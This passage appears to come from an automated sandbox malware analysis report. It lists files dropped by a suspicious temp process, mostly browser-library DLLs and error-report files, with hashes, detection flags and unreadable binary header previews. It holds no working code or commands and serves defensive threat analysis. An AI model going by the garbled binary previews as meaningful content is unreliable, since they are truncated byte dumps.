                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\freebl3.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):685392
                                                          Entropy (8bit):6.872871740790978
                                                          Encrypted:false
                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: QyvAWkfdLM.exe, Detection: malicious, Browse
                                                          • Filename: uBgwoHPWaf.exe, Detection: malicious, Browse
                                                          • Filename: QJqJic3hex.exe, Detection: malicious, Browse
                                                          • Filename: HeYgs7bTvy.exe, Detection: malicious, Browse
                                                          • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious, Browse
                                                          • Filename: 3.exe, Detection: malicious, Browse
                                                          • Filename: 2.exe, Detection: malicious, Browse
                                                          • Filename: 4.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\mozglue.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.833616094889818
                                                          Encrypted:false
                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: QyvAWkfdLM.exe, Detection: malicious, Browse
                                                          • Filename: QJqJic3hex.exe, Detection: malicious, Browse
                                                          • Filename: HeYgs7bTvy.exe, Detection: malicious, Browse
                                                          • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious, Browse
                                                          • Filename: 3.exe, Detection: malicious, Browse
                                                          • Filename: 2.exe, Detection: malicious, Browse
                                                          • Filename: 4.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: CHA0VZiz8y.exe, Detection: malicious, Browse
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\msvcp140.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):450024
                                                          Entropy (8bit):6.673992339875127
                                                          Encrypted:false
                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\nss3.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2046288
                                                          Entropy (8bit):6.787733948558952
                                                          Encrypted:false
                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\softokn3.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):257872
                                                          Entropy (8bit):6.727482641240852
                                                          Encrypted:false
                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\GIEHIDHJDBFI\vcruntime140.dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80880
                                                          Entropy (8bit):6.920480786566406
                                                          Encrypted:false
                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_21AE.exe_235897738a4fe6486c9e644353fd78c2d6f76761_9eae43eb_ff4c4d6d-eeb9-4364-bbaa-6577c1b82971\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9894445865006594
                                                          Encrypted:false
                                                          SSDEEP:96:hiarp11ios6hqnFA7qnIfqBQXIDcQuc6vcEPcw30j+HbHg/8BRTf32rLOyKZzTv3:fr0oqlM0gr1XjvPF7zuiFQZ24IO85
                                                          MD5:533B0D16FBE4311CA895707DECD89876
                                                          SHA1:BA36B64FDEA472F3A62C9E22854FB5EAE4CC3EE6
                                                          SHA-256:B56E503BEE31D0B9A49DDA0AA2E82F145130ECC1E5EE427864DE40F01829E0DA
                                                          SHA-512:19C6B2264F31A37A912006175074BC024266B45372ADD7B5A4E4FF2052B47A2A70677474AD18A26622C3C138558689A2007A2453170D8B184041828F04E690EF
                                                          Malicious:false
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.2.3.6.0.6.1.5.4.0.5.1.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.2.3.6.0.6.2.0.8.7.3.8.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.4.c.4.d.6.d.-.e.e.b.9.-.4.3.6.4.-.b.b.a.a.-.6.5.7.7.c.1.b.8.2.9.7.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.f.9.1.9.4.3.-.d.a.1.3.-.4.b.a.c.-.8.f.0.b.-.7.4.a.0.a.8.4.9.9.b.4.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.1.A.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.4.-.2.4.0.4.-.b.5.d.f.b.b.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.d.9.b.4.f.b.9.d.f.8.3.f.f.0.2.c.6.a.8.d.c.b.7.9.4.2.a.5.b.6.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.2.1.A.E...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7359.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Sun May 26 22:27:41 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):53032
                                                          Entropy (8bit):2.831625542111079
                                                          Encrypted:false
                                                          SSDEEP:192:+NCJ/Xtgd6lHbOTB796YOymCFax0IIwfDhRZJsQoftVA91sIru0hrbPnhzn:kOgd6lCTBgYO6ax0IXfDhRP4YkIJtPhz
                                                          MD5:5EA8B1C76E9C7D656375CD44A0517BD7
                                                          SHA1:15F95A33ACD6A91990CF31C9C45C9D56C8651885
                                                          SHA-256:27B828147EF96CA68D9A3A589B2A55E140C53DF5177B41D7D3FE78FD8ADF6179
                                                          SHA-512:D16295A2DA1E30A878B63C05386133F7EF030D96BE18412A82B20BC719603453E5CA29392C72851EFEE78FFEBBE0B0C4D4AE8C4D0145A38C633C67609A9D94FA
                                                          Malicious:false
                                                          Preview:MDMP..a..... .......].Sf............4...............H........................1..........`.......8...........T...........@>.............. ..........|"..............................................................................eJ.......#......GenuineIntel............T...........H.Sf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7434.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8288
                                                          Entropy (8bit):3.6989082520976435
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJR06Zr6YEIJSUgIvgmfvgpDr89bsG0sfcycm:R6lXJy6F6YEmSUgogmfvhsGnfFp
                                                          MD5:82A0A69ADAA3DB57B13916B9A2164279
                                                          SHA1:E51F253A0B2DC013F873364B97E4F6CC20A4EA1A
                                                          SHA-256:C0279911DD7BFA5940044E9E05C4CD422813510168DADE0F5A23FF9E480DBAC7
                                                          SHA-512:0B15060CCCD00ED291CC8B2488252FF01BDCDEB437BC67479C43B4CB9AC6F3850E6B6519B31FAD6BC370D3550ECCD50A31F78ECF33E3A7C11AA5EBEEDFC95926
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7464.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4537
                                                          Entropy (8bit):4.4362787465144935
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwWl8zsmJg77aI9+hWpW8VYaYm8M4JnUFlh+q8kgvTm1GXd:uIjf8I7Yw7ViJW+vT+GXd
                                                          MD5:ADDBD8F2175176073A63BCB6A84329A6
                                                          SHA1:D8590EE25361D64FC41C8692D78AB0E7A9D7D1A9
                                                          SHA-256:84B340C2E419F57F02F6F58459B14DB18154E5C830E5ABEFCE0C16773B92A32B
                                                          SHA-512:AEDD1F8D94B308C2ED75EE60073DE2153C759AA6005C0A088F8A3C9E4FC4E1D208EE9D9B86E9F6C41AD5F918AAA0203FFA19EBC583AFCEF2916934278D1C9C63
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="340650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2459136
                                                          Entropy (8bit):6.052474106868353
                                                          Encrypted:false
                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):685392
                                                          Entropy (8bit):6.872871740790978
                                                          Encrypted:false
                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):608080
                                                          Entropy (8bit):6.833616094889818
                                                          Encrypted:false
                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):450024
                                                          Entropy (8bit):6.673992339875127
                                                          Encrypted:false
                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):2046288
                                                          Entropy (8bit):6.787733948558952
                                                          Encrypted:false
                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):257872
                                                          Entropy (8bit):6.727482641240852
                                                          Encrypted:false
                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll

                                                          Download File
                                                          Process:C:\Users\user\AppData\Local\Temp\katA304.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80880
                                                          Entropy (8bit):6.920480786566406
                                                          Encrypted:false
